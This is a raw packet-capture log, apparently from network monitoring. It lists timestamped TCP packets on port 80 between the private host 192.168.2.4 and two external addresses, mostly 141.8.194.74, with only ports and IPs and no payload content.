Jan 14, 2022 00:16:15.390188932 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390211105 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390222073 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390233040 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390254021 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390275002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390292883 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390296936 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390306950 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390317917 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390341043 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390353918 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390360117 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390383005 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390404940 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390407085 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390425920 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390448093 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390455961 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390486956 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390510082 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390517950 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390533924 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390556097 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390575886 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390578032 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390603065 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390619993 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390625954 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390630960 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390649080 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390672922 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390687943 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390693903 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390718937 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390729904 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390744925 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390768051 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390789032 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390803099 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390810966 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390835047 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390852928 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390856981 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390870094 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390880108 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390902996 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390916109 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390925884 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390949965 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390959024 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390975952 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390995979 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.391019106 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.391020060 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.391041994 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.391053915 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.391064882 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.391088009 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.391096115 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.391110897 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.391134977 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.391144037 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.391160011 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.391182899 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.391190052 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.391206026 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.391231060 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.391242027 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.391284943 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.405353069 CET	49924	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.405458927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.405592918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.405699015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.405829906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.405930042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.406039000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.461865902 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.461899042 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.461920023 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.461940050 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.461960077 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.461977005 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.461986065 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.461998940 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.462022066 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.462032080 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.462044954 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.462066889 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.462083101 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.462090015 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.462105036 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.462112904 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.462135077 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.462156057 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.462167025 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.462179899 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.462202072 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.462208986 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.462256908 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.464078903 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464106083 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464127064 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464162111 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.464163065 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464185953 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464207888 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464221001 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.464262009 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.464721918 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464799881 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464822054 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464843035 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464858055 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.464864016 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464899063 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.464909077 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464931011 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464952946 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464963913 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.464975119 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.464998007 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.465012074 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.465046883 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.465832949 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.465868950 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.465893984 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.465918064 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.465934038 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.465940952 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.465965986 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.465980053 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.465991974 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466015100 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466015100 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466038942 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466062069 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466084957 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466087103 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466109037 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466130972 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466131926 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466155052 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466178894 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466186047 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466201067 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466223001 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466231108 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466243029 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466248989 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466298103 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466304064 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466321945 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466342926 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466367006 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466373920 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466392040 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466413975 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466417074 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466438055 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466460943 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466460943 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466485023 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466509104 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466509104 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466577053 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466598988 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466625929 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466649055 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466674089 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466726065 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466752052 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466774940 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466799021 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466819048 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466820955 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466829062 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466845989 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466869116 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466888905 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466891050 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466907024 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.466914892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466939926 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466962099 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.466974020 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.467011929 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467014074 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.467036009 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467057943 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467080116 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467102051 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467120886 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.467124939 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467149019 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467174053 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467189074 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.467196941 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.467240095 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.467245102 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467257977 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467277050 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467300892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467324018 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467338085 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.467345953 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467390060 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467401028 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.467408895 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.467413902 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467458010 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467469931 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.467482090 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.467562914 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.536780119 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.536812067 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.536833048 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.536851883 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.536876917 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.536897898 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.536912918 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.536920071 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.536943913 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.536945105 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.536968946 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.536993027 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.536999941 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.537017107 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.537039995 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.537050009 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.537064075 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.537087917 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.537110090 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.537110090 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.537130117 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.537133932 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.537156105 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.537178993 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.537187099 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.537225962 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.538749933 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.538777113 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.538849115 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.539235115 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539259911 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539282084 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539309978 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539321899 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.539334059 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539357901 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539370060 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.539422989 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.539490938 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539513111 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539534092 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539556026 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539568901 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.539577007 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539599895 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539613962 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.539622068 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539644957 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.539649010 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.539694071 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.540868998 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.540894985 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.540970087 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.541058064 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541079998 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541100979 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541121006 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541141987 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541141987 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.541162968 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541182995 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.541183949 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541207075 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541225910 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.541285992 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.541749954 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541790962 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541811943 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541834116 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541851997 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.541889906 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541903019 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.541913986 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541935921 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541959047 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.541970968 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.541981936 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542006016 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542017937 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542071104 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542072058 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542093992 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542118073 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542140007 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542155027 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542165041 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542188883 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542203903 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542212009 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542236090 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542244911 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542258978 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542282104 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542298079 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542304039 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542327881 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542336941 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542396069 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542572975 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542603016 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542625904 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542649031 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542663097 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542669058 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542692900 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542706013 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542714119 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542733908 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542737007 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542759895 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542781115 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542795897 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542802095 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542825937 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542833090 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542846918 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542869091 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542874098 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542889118 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542911053 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542917013 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.542984009 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.542984962 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.543008089 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.543031931 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.543054104 CET	80	49920	141.8.194.74	192.168.2.4
